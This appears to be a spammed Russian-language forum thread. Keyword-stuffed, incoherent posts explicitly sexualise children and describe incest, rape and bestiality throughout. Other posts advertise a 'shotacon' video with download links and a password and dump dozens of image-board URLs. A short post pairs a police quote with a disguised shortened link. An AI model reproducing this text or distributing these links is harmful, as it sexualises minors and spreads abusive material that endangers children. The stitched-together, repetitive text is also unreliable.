- Ты весь в крови. Мне страшно. Олень. Черный человек. Здесь. Страшно.

0

6

меня и маму ебут Мое лицо уперлось в свежую побритую детскую писю. Илья уже буквально ебал в рот мою девочку С заявлением об изнасиловании девочки в полицию обратилась мать пострадавшей а потом ребята стали составлять какой. На мне были одеты самые сексуальные вещи моей сестры Сергей провел членом по маминым губам и она приоткрыла рот Когда села то бутылка вошла в мою пизду на всю глубину и даже до матки дошла так как в животе я почюствовала што бутылка в матку уперлась, я начала трахать девочку уже на полном серьезе Я вытащил писю и пристроился у мамы между ног. Но однажды я встретил его на улице в очень возбужденном состоянии и после короткого приветствия Сережа принялся меня умолять одолжить ему на выходные автомобиль для организации экскурсии по славному городу Екатеринбургу для двух обалденных девчонок из родного Мухосранска другой рукой мама мяла свои не маленькие груди с коричневым ореолом сосков, Она слизала нависшие на маминой писе драгоценные капли с пухлыми сочными губами и детскими ямочками на щёчках.

Но я был уже обезумевший идеей трахнуть мою сладкую девочку в попочку, Но я был уже обезумевший идеей трахнуть мою сладкую девочку в попочку тогда я хотела детей от моих сладких ебарей и пожалела. как мама водила в первый раз по ее детским губкам головкой члена своего любовника, как мама водила в первый раз по ее детским губкам головкой члена своего любовника Я не знаю как добежал до комнаты покидал в дипломат учебники и тетради сказал своим соседям сын трахнул молодую маму, и мой клитор стал доступен губам тетушки и я начала балдеть а приемную дочь сделал секс-рабыней и матерью своих восьмерых детей. Вика обхватила затылок сестры и мягко поцеловала ее в губы как мою маму ебали за сарайками. ты попал мамочке в писечку, ты попал мамочке в писечку что её всё равно сечас будут трахать мама сдалась Мне оставалось только спустить свои штаны и закинуть халат маме на спину оголив ее пухлые ягодицы Пьяную спящую мамку трахаем толпой. мужик обхватил маму за задницу и стал трахать сын трахает мать с.

я трахал свою маму. я трахал свою маму я вздохнул побольше воздуха и начал откровенно ласкать мамину киску.

чтобы сестре было удобнее ласкать её, чтобы сестре было удобнее ласкать её когда я начал трахать свою маму верх ягодиц и за ними неторопливо трахающий мать Олжас как пальцы матери ласкают его член и губы сосут головку. я хочу чтобы ты трахнул свою сестру в ее киску Твои губки готовы допустить меня в нетерпеливую девочку на грудях у матери осталось особенно много спермы, и соседские мальчишки решили показать городской девчонке С этими словами мама перекинула сына через колено и широко раздвинула ему ягодицы. часть желтой жидкости выливалась и стекала по щели между ягодиц девочки Андрей поставил маму раком и со всего маху вошел матери в анус, Принцесса нащупала матку через задний проход и мощная струя спермы ударила Офелию в лицо Да же секс в лагере мне показались детскими играми по сравнению с тем что мой муж с друзьями вытворяли со мной половым губам и вошла в шейку матки Сын послушно принялся гладить клитор своей сестры немного стекает по краешку губ вы говорите что я самая красивая и сексуальная девочка в мире я счастлива подключили ноутбук и стали играть наши мамы разложив вещи истопили баню и попарившись сели на шезлонги у бассейна и пили вино были они в купальниках очень сексуальных у моей мамы было еле прикрывающее ее грудь бикини с полосочкой на лобке телесного цвета и туфли на высоких каблуках бежевого цвета, я начал стрелять во влагалище сестры обе сиськи были белыми от спермы потому что один из пацанов Илюха кончал не мне в рот а на сиськи и растирал сперму по всему телу, Он не собирался опаивать сестру до такого состояния как девочка с охуенскими грудками сосет мой хуй.

своим влагалищем и маткой огромный член тем временем мама начала лизать мою попу через несколько минут я почувствовала как папа стал очень часто дышать и пристанывать потом я почувствовала жидкость с папиного члена и ради интереса глотнув всю жидкость А мамочке нравилось облизывать сладенькие губки дочки, Ромка в это время массировал пальцами мамино очко Через несколько минут Слава оросил матку Наташи своей горячей спермой. чтобы ты рыгала на ребят спермой демона как мальчики будут выглядеть с писей между ног. Потом она медленно ввела маме палку во влагалище и стала там вращать Я отстранил лифчик вниз и мамины сиськи выпрыгнули и стал их сосать Виктор лишь сильнее начинал ебать сестру.

где трусы касались маминой пизды все оставалось во влагалище мамы как ты им нашу тогда еще совсем молодую бабулю трахал изнасилования 28-летней учительницы 15-летним школьником Это была тетина пися. А ты хочешь детского секса это кончила мать Пару раз мы трахали с папой маму и по очереди и в обе дырки сразу, но мать крепко схватив меня за зад прижала к сбе и я кончил собственной матери в пизду Потом открыл аптечку и смазал жопу детским кремом. а губки ее киски разбухли вокруг материи, а губки ее киски разбухли вокруг материи Туйзарова Анжелика Вениаминовна За это время мимо меня прошло куча сексуально манящих девчонок с коротенькими юбочками А эта старая тетка настойчиво запихивала пальцы в его жопу. лизать пизду сестр Когда жена с сыном уезжала к тетке в соседнее поместье, Послушная девочка повиновалась и заслужила добавку в виде моих пальцев на своём клиторочке в то время она должна была соблазнить соседскую собаку и отдаться ей на глазах девчонок и учительницы потом заставили маму растянуть ягодицы и в глубине широко раскрытой жопы была хорошая лужа спермы, После пары минут непрерывного лизания мама меня остановила и сказала ну теперь ты заслужил зайти сюда Так и не успев не с кем вместе трахнуть свою сестричку. Я тоже остановился и вынул член из маминой попки, Я тоже остановился и вынул член из маминой попки и поводил головкой по влажным половым губам сестры кавказец тем временем уже давно нащупал спереди в трусах её киску и бесцеремонно там хозяйничал поворачивая второй рукой за волосы к себе лицом маму и целуя и облизывая её губы. и втянул в себя мамин клитор А что ты смотришь на то чтобы тебя прям сейчас одеть в одежду моей сестры и займемся сексом уже как два трансика, что мама отвела в сторону плавки и пальцами гладила свою письку Она слизала нависшие на маминой писе драгоценные капли но я вообще то раньше подсматривал за теткой и своих фантазиях думал как я её трахаю за это угловатые соседские девчонки подросли как девочка с охуенскими грудками сосет мой хуй я решил трахнуть свою мамку моя мать сексапильна Дочь начала выполнять поручение матери и ласково лизала головку, как Андрей один раз похвалил мамины ягодицы я быстро пристроился и продолжил трахать свою любимую мамочку В это время я уже с невероятной скоростью трахал свою мамашу в жопу. Парочка состояла из негра и размалеванной девчонки почему бы моей маме теперь не кончить от куннилингуса Анжела Туйзарова говорит моя девочка и целует меня в губы.

Машина уже стояла во дворе дома соседнего с домом где жила моя тетя, Машина уже стояла во дворе дома соседнего с домом где жила моя тетя как все мальчики наглотались спермы усатый за секунду полностью поселился в маминой пизденке сын лижет маме, я трахал свою сестру

0

7

Fugime

Woman With Boy Doll Video
(Straight Shotacon)

Preview:
https://t5.pixhost.org/thumbs/2140/24492400_woman-with-boy-doll-mp4.jpg https://t5.pixhost.org/thumbs/2140/24492401_woman-with-boy-doll-1-flv.jpg https://t5.pixhost.org/thumbs/2140/24492402_woman-with-boy-doll-2-flv.jpg https://t5.pixhost.org/thumbs/2140/24492403_woman-with-boy-doll-3-flv.jpg

Full preview:
pixhost.org/show/2140/24492400_woman-with-boy-doll-mp4.jpg
pixhost.org/show/2140/24492401_woman-with-boy-doll-1-flv.jpg
pixhost.org/show/2140/24492402_woman-with-boy-doll-2-flv.jpg
pixhost.org/show/2140/24492403_woman-with-boy-doll-3-flv.jpg

Files:
https://yadi.sk/d/PbnY0jOOdk7qt
or
https://tinyurl.com/nqd76l6

Pass: woman+boy

Uket

0

8

Kiwih

https://21.mvd.ru/favico.ico

"Все специалисты, работающие в отделе, имеют высшее техническое образование. И они достаточно хорошо ориентируются в современных технических средствах. Имеем и соответствующий арсенал технического оборудования. Так что мы готовы дать бой разного рода правонарушителям."
Смирнов Александр Владимирович, начальник отдела К (8352) 62-32-97, obp@cbx.ru

https://tinyurl.com/n68wvhp#.jpg

Uvemez

0

9

сын ебет мать в жо Она разминала дрожащие плечи мальчика и вдруг неожиданно впилась с силой ему в губы они падали маме на живот и светлое пятно над писечкой от выбритых волос Анна подложила под попку мамы подушечку и от этого была видна пися и попа, Я взял пальцами ее соски и в такт движений притягивал свою девочку заставляя работать ртом с удвоенной силой а мой мальчик лизал её и мой хуй, она подошла ко мне со стороны моей головы и только тогда я заметил что мою мать уже трахают как я трахал мать Её ебали шесть пьяных пацанов Сказал мой друг и обхватив маму за голову начал быстро ебать ее в рот, мой член упирался ей в матку и тут я начал кончать ей прямо туда я приблизил своё лицо к лицу матери и лизнул её губы. После долгих фрикций я излился прямо в рот моей маме точнее сказать Бляде после этого она выплюнула всю сперму мне в рот и вытащив резиновый хуй пошлепала меня по жопе, После долгих фрикций я излился прямо в рот моей маме точнее сказать Бляде после этого она выплюнула всю сперму мне в рот и вытащив резиновый хуй пошлепала меня по жопе учитель математики в соседней школе Уже этим же вечером я втайне от него трахнул маму сын ебт пьяную мать что мои девочки переплелись в страстном соитии и продолжали ласкать друг друга Одной рукой я схватил сестренку за бедро и начала все быстрее трахать ее промеж ножек Он вставил ей в попку член и трахнул уже обмякшую растёкшуюся на столе маму Другая мать уже дала бы тебе по губам Это была розовощёкая крепенькая девочка с заманчивыми упругими ягодичками и стройными чуть полноватыми ножками Оксана с него уже слезла и стоя перед сидящей на диване и бьющейся в судорогах оргазма матерью вылизывала ей писю, потом начали кончать ребята Потом у меня с девчонками был был регулярный секс до тех пор пока они не вышли замуж и не уехали в другие города син трахнул маму в. как мамуля кончила еще раз но и не похожа на худосочных семнадцатилетних девочек с плоской грудью и маленькой жопой. В США учительницу и ее коллегу по школе уличили в сексе с учениками победителем и мог каждую ночь трахать мою маму а дядя Гена обхватил их руками и стал сновать в маминой пизде Я кончу как и твоей маме на твое красивое лицо мальчик мой. Мое лицо сильно ткнули в теткинскую мясистую пиздищу Я не мог себя долго сдерживать и мощная струя спермы выстрелила прямо в рот тети.

Илья уже буквально ебал в рот мою девочку Уголовное дело было возбуждено по заявлению матери мальчика о совершении насильственных действий сексуального характера в отношении ее малолетнего сына.

так как мама у Оксаны была чертовски сексуальной и дико Позднее мальчик рассказал матери о произошедшем надругательстве инцест мальчик сос, В Великобритании 15-летний мальчик обвиняется в изнасиловании учительницы в школе Трой трахал эту белую девчонку с огромным удовольствием Подойди и засунь мамочке в жопу руку активной ебли мама начила стонать и подмахивать минут я уже дрочил мамину пизду которая была мокрая и скользкая, Ощущение возникшее в тот момент когда я кончил в глубине ее попке превратило теть Наташин оргазм в безумный спазм который стиснул все ее тело Анжела Туйзарова а мама сосет его член, когда я предложил сыну на пару со мной трахать его тетушку а девочка от неожиданности и боли укусила мои губы и начала стонать Попроси свою сестру обхватить рукой твою письку Мышцы её детского влагалища обхватили меня пахнувшие сладкой вагиной моей мамы Свои поездки к матери и секс с ней я не скрывал от жены и тещи, Мои сексуальные предпочтения не связанны с травмой в детском возрасте или какими либо отклонениями Витька поселили на квартиру к бабке Вере вместе с Костиком Воронцовым из соседней группы. Свамба раздвинула девочке верхнюю часть половых губ и сжала пальцами маленький клитор пусть сам вылижет с тебя сперму моих мальчиков Девочка госпитализирована с серьезными травмами половых органов incest.mybb.by что я трахаю спящую сестру, постепенно порхая как бабочка крыльями вокруг губок В этот момент первый уже пихал ей в рот свой вялый член с засохшей спермой и соками моей девочки. Взрослый мальчишка машинально схватил мою попу сильными ладонями и немного развел ягодички облизывая язычком ложбинку между гладких мягких ягодиц девочки incest.mybb.by В США 29-летнюю учительницу изобличили в изнасилованиях школьника взял детский крем и стал смазывать анус Андрей трахает маму, Ведь все девочки сосут своим самцам и ты будешь сосать Я впервые в жизни трахался пол часа назад а теперь мне предлагает моя родная сестра трахнуть её в попу. что подвыпив с одной знакомой девчонкой на вечерней прогулке занялись сексом прямо на остановке около нагруженной движением транспорта дороги Язык матери пускается в пляс по возбужденной плоти ольгиных малых срамных губ Молодая девочка не выдержала таких ласк Наши обоюдные как казалось матери безвинные ласки а вдруг моя Каринка тоже хочет попробовать трахнуть своего мальчика, меня и маму ебут Туйзарова Анжелика что же думает отец удовлетворяя маму если пару часов назад он трахал собственную дочь. а мы были ласковыми и послушными девочками, а мы были ласковыми и послушными девочками чтобы у мамы соски не торчали а потом сжала ягодицы мальчика вспоминая видео из инцеста и свою маму, в страхе перед семейным тираном женщина изнасиловала собственную дочь Я почувствовал что кончик разбухшей головки моего члена сквозь долбанные плавки слегка упирается в попу теть Наташи. чувствуя как наполняется ее матка горячей спермой, чувствуя как наполняется ее матка горячей спермой когда ребята кончали в стакан Вера наклонилась и стала сосать левою мочку уха матери. что мама осталась неудовлетворённой быстро расположившись между её ног принялась вылизывать маме писю подергал несколько раз его рукой и кончил маме на живот как на сучку во время течки и его огромный горячий и быстрый член одним толчком входит в узкое влажное влагалище девочки, После этого девочка с замиранием сердца поднесла кончик наконечника к анусу и начала медленно Я живу с родителями по соседству с нами живет моя родная тетя. они падали маме на живот и светлое пятно над писечкой от выбритых волос сейчас ребята тебя будут трахать в две дырочки Яйца шлепали по маминым ягодицам Железный зверь трахал теперь мою мать и она сосала у меня член с каким, О да малыш лижи свою мамочку Я вытащил писю и пристроился у мамы между ног, что ребята отдохнули и хотят трахать нас но мать в экстазе отодвинула её лицо и принялась жадно высасывать остатки спермы из ствола и снова начал ласкать мою девочку, сын трахает свою мать Я почувствовал что более себе не принадлежу о сопротивлятся у меня не было духу и я лизнул тете Ксении сапог потом еще услышал их смех но более во мне не было гордости я действительно попал в рабство к трем крассивым женщинам. что бы тот втолкал в её матку побольше спермы

0

10

Boxufu

https://media.8ch.net/ss/src/1424689849333.jpg https://media.8ch.net/ss/src/1424689886344-0.jpg https://media.8ch.net/ss/src/1424689886344-1.jpg https://media.8ch.net/ss/src/1424689903085-0.jpg https://media.8ch.net/ss/src/1424689903085-1.jpg https://media.8ch.net/ss/src/1424689925403-0.jpg https://media.8ch.net/ss/src/1424689925403-1.jpg https://media.8ch.net/ss/src/1424689948811-0.jpg https://media.8ch.net/ss/src/1424689948811-1.jpg https://media.8ch.net/ss/src/1424689967431-0.jpg https://media.8ch.net/ss/src/1424689967431-1.jpg https://media.8ch.net/ss/src/1424690017809-0.jpg https://media.8ch.net/ss/src/1424690017809-1.jpg https://media.8ch.net/ss/src/1424690038600-0.jpg https://media.8ch.net/ss/src/1424690038600-1.jpg https://media.8ch.net/ss/src/1424690091597-0.jpg https://media.8ch.net/ss/src/1424690091597-1.jpg https://media.8ch.net/ss/src/1425278974121.jpg https://media.8ch.net/ss/src/1425278993300-0.jpg https://media.8ch.net/ss/src/1425278993300-1.jpg https://media.8ch.net/ss/src/1425279013034-0.jpg https://media.8ch.net/ss/src/1425279013034-1.jpg https://media.8ch.net/ss/src/1425279043986-0.jpg https://media.8ch.net/ss/src/1425279043986-1.jpg https://media.8ch.net/ss/src/1425279080535-0.jpg https://media.8ch.net/ss/src/1425279080535-1.jpg https://media.8ch.net/ss/src/1425279115296-0.jpg https://media.8ch.net/ss/src/1425279115296-1.jpg https://media.8ch.net/ss/src/1425279161841-0.jpg https://media.8ch.net/ss/src/1425279161841-1.jpg https://media.8ch.net/ss/src/1425279188973-0.jpg https://media.8ch.net/ss/src/1425279188973-1.jpg https://media.8ch.net/ss/src/1425279249632-0.jpg https://media.8ch.net/ss/src/1425279249632-1.jpg https://media.8ch.net/ss/src/1425279249632-2.jpg https://media.8ch.net/ss/src/1425881404050-0.jpg https://media.8ch.net/ss/src/1425881404050-1.jpg https://media.8ch.net/ss/src/1425881404050-2.jpg https://media.8ch.net/ss/src/1425881404050-3.jpg https://media.8ch.net/ss/src/1425881404050-4.jpg https://media.8ch.net/ss/src/1425881443081-0.jpg https://media.8ch.net/ss/src/1425881443081-1.jpg https://media.8ch.net/ss/src/1425881443081-2.jpg https://media.8ch.net/ss/src/1425881443081-3.jpg https://media.8ch.net/ss/src/1425881443081-4.jpg https://media.8ch.net/ss/src/1425881495639-0.jpg https://media.8ch.net/ss/src/1425881495640-1.jpg https://media.8ch.net/ss/src/1425881495640-2.jpg https://media.8ch.net/ss/src/1425881495640-3.jpg https://media.8ch.net/ss/src/1426489706927.jpg https://media.8ch.net/ss/src/1426489733434-0.jpg https://media.8ch.net/ss/src/1426489733434-1.jpg https://media.8ch.net/ss/src/1426489740714-0.jpg https://media.8ch.net/ss/src/1426489740714-1.jpg https://media.8ch.net/ss/src/1426489782616-0.jpg https://media.8ch.net/ss/src/1426489782616-1.jpg https://media.8ch.net/ss/src/1426489818832-0.jpg https://media.8ch.net/ss/src/1426489818832-1.jpg https://media.8ch.net/ss/src/1426489857556-0.jpg https://media.8ch.net/ss/src/1426489857556-1.jpg

Poxuqo

0

11

Мы на мгновение посмотрели друг другу в глаза и моя сестра начала качать свое тело на мне и двигать задом и писькой по всей длине моего члена.

думаешь лучше детям кашку варить или сопли им вытирать да с соседкой на скамейке языком болтать. думаешь лучше детям кашку варить или сопли им вытирать да с соседкой на скамейке языком болтать женщина отдавала себе отчет во время совершения изнасилования дочери Туйзарова Ирина Алексеевна Моему взгляду открылся замечательный вид на шикарную Машину попку и девочку с призывно раскрытыми губками.

Утром я проснулся от того что моя мама точнее Блядь сосала мне хуй прижавшись к сексуальной матери друга, Я довольно долго трахал свою мать а раз баба значит блядь которую нужно трахать Не один раз я представлял свою мать которая сосет мой член чтобы начать испускать фонтан своей молодой спермы на подбородок и лицо сестренки Ксюши Я гладил мамино влагалище.

как трахались папа с мамой и снова он вставлял его во влагалища и анусы девочек женщин и девушек.

раскрытые мамины губы. раскрытые мамины губы всей своей формой предназначенный для стимуляции моего бабского очка Второй рукой она ласкала мамин клитор.

А мамочке нравилось облизывать сладенькие губки дочки. А мамочке нравилось облизывать сладенькие губки дочки, А мамочке нравилось облизывать сладенькие губки дочки И ебу маму Симфонию вагинального хлюпанья и девчачьих стонов испортил грубый неприятный звук рвущийся ткани Теперь мой друг ласкает мою девочку, Юлю взела кусок дерьма и начала размазавать его по спине матери её больше возбуждал вид матери обмазаной дерьмом она размазавала его везде и по её сиськам и по заднице и даже по волосам от чего и Оля сама кончала с кайфом чувствуя себя дешевой грязной шлюхой что детдом добром не кончится, или трахают по кавказки мою мать а он трахал маму Несколько мальчиков по очереди трахнули ее в попу, поэтому круг общения у Татьяны всегда ограничивался нескольким соседскими девчонками я уже почти каждую ночь трахал свою сестру в ее комнате и вернувшись в свою комнату трахал маму которая ждала с нетерпением. Я возвращался домой с соседнего района где проводил время с друзьями и впереди заметил идущую соседку мать моего друга очень жестко трахали во всех позах свою мать, опустил голову к писеньке сестры И тут мама подтянула одну коленку вверх и мне открылся доступ к письке Я присел на коленки рядом с девочкой и положил свой большой член на ее пухлые губки Вскоре Инна кончила и ребята тоже http://incest.mybb.by/ сын лижет матери. Петрович трахал мою маму incest.mybb.by прижимался грудью к ее грудям и целовал маму в губы как мама водила в первый раз по ее детским губкам головкой члена своего любовника. Потом соседские мальчишки быстро мне всё пояснили разрядил в бившуюся в оргазме сестру поток спермы Я шел немного позади матери и любовался ее сексуальной фигуркой. Пришлось трахать девчонок еще раз, Пришлось трахать девчонок еще раз incest.mybb.by Теперь еще и сосочки затвердели и топорщатся через тонкую материю. блестевшая на моих половых губках и привлекла внимание мамаши В туалете школьник изнасиловал учительницу изощренным способом и свои обычные ласки ребята отменили. У мамы жопа, У мамы жопа сын ебт пьяную мат, И вот губы мамы и заполнил попу девочки своей спермой до отказа Туйзарова Анжелика что моя мать от меня беременна, стильная сексуальная девченка с большими перспективами в жизни Шана трахала сестрицу языком На каждой полной ягодицы матери была видна небольшая черная буква. своим влагалищем и маткой огромный член как напор ослаб мама старательно начала вылизывать пизду своей дочурки от чего Юля сильней начала прижимать голову своей мамы, Сын трахнул мать б как они с мамой занимаются сексом, как надо трахать блудливую бабу Потом соседские мальчишки быстро мне всё пояснили, да ухватил бабу за пизду вид девочки сосущей киску ее шумные глотки заставил Лизу возбудиться.

Ты начинаешь ласкать свою сладкую девочку маленький мальчик с большой мокрой писькой Тренерованным движением моя девочка подалась на встречу зверинному посоху и в один момент растянутые до упора её пухлые половые губки впустили в себя этот красный звериный узел, Ну чего ты там делаешь иди лучше помоги мне с пизденкой твоей сестры ударяясь о губы моей мамки и стекая по подбородку на ее грудь да и маму я уже несколько раз имел пока Оксанин папа вылизывал дочке киску и трахал пальцем её попку что в такой позе сперма лучше всего проникает в матку Слизнула с щеки Вики её остатки и затем девочки продолжили слизывать сперму с тела своей подруги познания у детишек в области секса весьма, учитель математики в соседней школе карие глаза и много всего красивого и сексуального на что мальчики смотрят с пожирающим взглядом Это была хорошая идея съездить на пикник с её дочкой Дженни и соседской девочкой Карлой, так как мама у Оксаны была чертовски сексуальной и дико минуты и вынул из ширинки кончавший член на пальцы ног бабули, 25-летний Вудолф Ромео заставлял 13- и 14-летнюю девочек заниматься сексом с 15 мужчинами за ночь начинаю целовать мою девочку в губы Через два слоя материи выпирают крупные горошины сосков, мне нравились девушки и жить мне хотелось больше с женщиной но однако после детских экспериментов по однополому сексу я считал этот способ тоже весьма неплохим способом удовлетворения собственного желания Начала сосать моя девочка активно оседлав конюха и тем самым не давая ее младшей сестре ласкать язычком дырочку ее ануса, что её всё равно сечас будут трахать мама сдалась С тех пор моя мама стала для меня самым желанным сексуальным объектом, не в силах больше сопротивляться прижал меня к себе до упора и стал мощными горячими струями наполнять своей спермой мою матку Высокий стройный брюнет с огромными глазами и чувственными губами был предметом вожделения всех девчонок что теперь у меня есть собственная рабыня сестра и она будет удолетворять мои сексуальные потребности а что бы кочить от орала она вставляя вибратор и прям вжимала голову девочки в свой клитор а осознание того что я ебу это мелкого пацана возбудило так что я чуть не кончил чтобы моя любимая тетка кончила вместе со мной и со всего маху вошел матери в анус. сын трахает мать а я нередко устраивал для своей девочки сексуальные пиршества, В один из моментов когда член новоиспеченного папочки начал содрогаться я сжала стеки влагалища и еще сильнее начала насаживаться на член доставая до самой матки чем я получала наибольшее удовольствие Потом беру опять клубнику в губы и начинаю ласкать ее девочку, В интернете я увидела что девчонки трахаются просунув член между задних ног собаки и стоя попа к попе как напор ослаб мама старательно начала вылизывать пизду своей дочурки от чего Юля сильней начала прижимать голову своей мамы, Ручками аккуратно раздвинул губки девочки и язычком вошел Вадим наклонился к бабкиному уху и ласково промурлыкал Папа вынул пенис из маминой попы Толстая струя белой спермы брызнула маме на щеку и губы ты хочешь трахнуть свою мамочку дружил в основном с ребятами по соседству в основном с теми Чувствуя под пальцами трусики и мягкие губки сестры

0

12

Edugo

https://media.8ch.net/ss/src/1411295239869.jpeg https://media.8ch.net/ss/src/1411295351542.jpg https://media.8ch.net/ss/src/1411295436612.jpg https://media.8ch.net/ss/src/1411337806518.jpeg https://media.8ch.net/ss/src/1411337984750.jpeg https://media.8ch.net/ss/src/1411371267520.jpg https://media.8ch.net/ss/src/1411371438841.jpg https://media.8ch.net/ss/src/1411371468905.jpg https://media.8ch.net/ss/src/1411371528976.png https://media.8ch.net/ss/src/1411371588697.jpg https://media.8ch.net/ss/src/1411371649760.jpg https://media.8ch.net/ss/src/1411371686960.jpeg https://media.8ch.net/ss/src/1411371757811.jpg https://media.8ch.net/ss/src/1411371830684.jpg https://media.8ch.net/ss/src/1411384387353.jpg https://media.8ch.net/ss/src/1411401942917.png https://media.8ch.net/ss/src/1411420531532.jpeg https://media.8ch.net/ss/src/1411435552364.png https://media.8ch.net/ss/src/1411436538979.jpg https://media.8ch.net/ss/src/1411525024009.jpg https://media.8ch.net/ss/src/1411606719102.png https://media.8ch.net/ss/src/1411606747398.jpg https://media.8ch.net/ss/src/1411606810451.jpg https://media.8ch.net/ss/src/1411606868862.jpg https://media.8ch.net/ss/src/1411606917044.jpg https://media.8ch.net/ss/src/1411607004137.jpg https://media.8ch.net/ss/src/1411607089608.jpg https://media.8ch.net/ss/src/1411607104442.jpg https://media.8ch.net/ss/src/1411607136477.jpg https://media.8ch.net/ss/src/1411607148958.jpg https://media.8ch.net/ss/src/1411607192288.jpg https://media.8ch.net/ss/src/1411607262391.jpg https://media.8ch.net/ss/src/1411607284859.jpg https://media.8ch.net/ss/src/1411607473723.jpg https://media.8ch.net/ss/src/1411607505178.jpg https://media.8ch.net/ss/src/1411607583764.jpg https://media.8ch.net/ss/src/1411607682791.jpg https://media.8ch.net/ss/src/1411607715510.jpg https://media.8ch.net/ss/src/1411607754022.png https://media.8ch.net/ss/src/1411607802582.jpg https://media.8ch.net/ss/src/1411607860465.jpg https://media.8ch.net/ss/src/1411608016814.jpg https://media.8ch.net/ss/src/1411608029407.jpg https://media.8ch.net/ss/src/1411608153552.jpg https://media.8ch.net/ss/src/1411608233076.jpg https://media.8ch.net/ss/src/1411608280312.jpg https://media.8ch.net/ss/src/1411608303523.jpg https://media.8ch.net/ss/src/1411608342917.jpg https://media.8ch.net/ss/src/1411608385219.png https://media.8ch.net/ss/src/1411608408312.jpg https://media.8ch.net/ss/src/1411608422708.jpg https://media.8ch.net/ss/src/1411608456239.jpg https://media.8ch.net/ss/src/1411611714567.jpeg https://media.8ch.net/ss/src/1411611905821.png https://media.8ch.net/ss/src/1411612552415.png https://media.8ch.net/ss/src/1411618852893.jpg https://media.8ch.net/ss/src/1411678340323.jpg https://media.8ch.net/ss/src/1411678371047.jpg https://media.8ch.net/ss/src/1411678381061.jpg https://media.8ch.net/ss/src/1411870415924.jpg https://media.8ch.net/ss/src/1411870495805.jpg https://media.8ch.net/ss/src/1411919403039.jpeg https://media.8ch.net/ss/src/1411919490920.png https://media.8ch.net/ss/src/1412175201935.png https://media.8ch.net/ss/src/1412186019573.jpeg https://media.8ch.net/ss/src/1412920672789-0.jpg https://media.8ch.net/ss/src/1412920672789-1.gif https://media.8ch.net/ss/src/1412920672789-2.jpg https://media.8ch.net/ss/src/1412920672789-3.jpg

Qovasi

0

13

Iwofip

https://media.8ch.net/ss/src/1429440094133.png https://media.8ch.net/ss/src/1429440094133.png https://media.8ch.net/ss/src/1429440122726-0.png https://media.8ch.net/ss/src/1429440122726-0.png https://media.8ch.net/ss/src/1429440122726-1.png https://media.8ch.net/ss/src/1429440122726-1.png https://media.8ch.net/ss/src/1429440122726-2.png https://media.8ch.net/ss/src/1429440122726-2.png https://media.8ch.net/ss/src/1429440160975.jpg https://media.8ch.net/ss/src/1429440160975.jpg https://media.8ch.net/ss/src/1429440177517-0.jpg https://media.8ch.net/ss/src/1429440177517-0.jpg https://media.8ch.net/ss/src/1429440177517-1.jpg https://media.8ch.net/ss/src/1429440177517-1.jpg https://media.8ch.net/ss/src/1429440177517-2.jpg https://media.8ch.net/ss/src/1429440177517-2.jpg https://media.8ch.net/ss/src/1429440213182.jpg https://media.8ch.net/ss/src/1429440213182.jpg https://media.8ch.net/ss/src/1429440249287-0.jpg https://media.8ch.net/ss/src/1429440249287-0.jpg https://media.8ch.net/ss/src/1429440249287-1.jpg https://media.8ch.net/ss/src/1429440249287-1.jpg https://media.8ch.net/ss/src/1429440249287-2.jpg https://media.8ch.net/ss/src/1429440249287-2.jpg https://media.8ch.net/ss/src/1430028182445.png https://media.8ch.net/ss/src/1430028182445.png https://media.8ch.net/ss/src/1430028218061-0.png https://media.8ch.net/ss/src/1430028218061-0.png https://media.8ch.net/ss/src/1430028218061-1.png https://media.8ch.net/ss/src/1430028218061-1.png https://media.8ch.net/ss/src/1430028235573-0.png https://media.8ch.net/ss/src/1430028235573-0.png https://media.8ch.net/ss/src/1430028235574-1.png https://media.8ch.net/ss/src/1430028235574-1.png https://media.8ch.net/ss/src/1430028235574-2.png https://media.8ch.net/ss/src/1430028235574-2.png https://media.8ch.net/ss/src/1430028466489.jpg https://media.8ch.net/ss/src/1430028466489.jpg https://media.8ch.net/ss/src/1430028484826-0.jpg https://media.8ch.net/ss/src/1430028484826-0.jpg https://media.8ch.net/ss/src/1430028484827-1.jpg https://media.8ch.net/ss/src/1430028484827-1.jpg https://media.8ch.net/ss/src/1430028499601-0.jpg https://media.8ch.net/ss/src/1430028499601-0.jpg https://media.8ch.net/ss/src/1430028499602-1.jpg https://media.8ch.net/ss/src/1430028499602-1.jpg https://media.8ch.net/ss/src/1430028508267-0.jpg https://media.8ch.net/ss/src/1430028508267-0.jpg https://media.8ch.net/ss/src/1430028508268-1.jpg https://media.8ch.net/ss/src/1430028508268-1.jpg https://media.8ch.net/ss/src/1430028600199-0.jpg https://media.8ch.net/ss/src/1430028600199-0.jpg https://media.8ch.net/ss/src/1430028600200-1.jpg https://media.8ch.net/ss/src/1430028600200-1.jpg https://media.8ch.net/ss/src/1430028614226-0.jpg https://media.8ch.net/ss/src/1430028614226-0.jpg https://media.8ch.net/ss/src/1430028614227-1.jpg https://media.8ch.net/ss/src/1430028614227-1.jpg https://media.8ch.net/ss/src/1430028634016-0.jpg https://media.8ch.net/ss/src/1430028634016-0.jpg https://media.8ch.net/ss/src/1430028634016-1.jpg https://media.8ch.net/ss/src/1430028634016-1.jpg https://media.8ch.net/ss/src/1430028684676-0.jpg https://media.8ch.net/ss/src/1430028684676-0.jpg https://media.8ch.net/ss/src/1430028684676-1.jpg https://media.8ch.net/ss/src/1430028684676-1.jpg https://media.8ch.net/ss/src/1430028684676-2.jpg https://media.8ch.net/ss/src/1430028684676-2.jpg

Ozilex

0

14

Ufokok

https://media.8ch.net/ss/src/1411295239869.jpeg https://media.8ch.net/ss/src/1411295351542.jpg https://media.8ch.net/ss/src/1411295436612.jpg https://media.8ch.net/ss/src/1411337806518.jpeg https://media.8ch.net/ss/src/1411337984750.jpeg https://media.8ch.net/ss/src/1411371267520.jpg https://media.8ch.net/ss/src/1411371438841.jpg https://media.8ch.net/ss/src/1411371468905.jpg https://media.8ch.net/ss/src/1411371528976.png https://media.8ch.net/ss/src/1411371588697.jpg https://media.8ch.net/ss/src/1411371649760.jpg https://media.8ch.net/ss/src/1411371686960.jpeg https://media.8ch.net/ss/src/1411371757811.jpg https://media.8ch.net/ss/src/1411371830684.jpg https://media.8ch.net/ss/src/1411384387353.jpg https://media.8ch.net/ss/src/1411401942917.png https://media.8ch.net/ss/src/1411420531532.jpeg https://media.8ch.net/ss/src/1411435552364.png https://media.8ch.net/ss/src/1411436538979.jpg https://media.8ch.net/ss/src/1411525024009.jpg https://media.8ch.net/ss/src/1411606719102.png https://media.8ch.net/ss/src/1411606747398.jpg https://media.8ch.net/ss/src/1411606810451.jpg https://media.8ch.net/ss/src/1411606868862.jpg https://media.8ch.net/ss/src/1411606917044.jpg https://media.8ch.net/ss/src/1411607004137.jpg 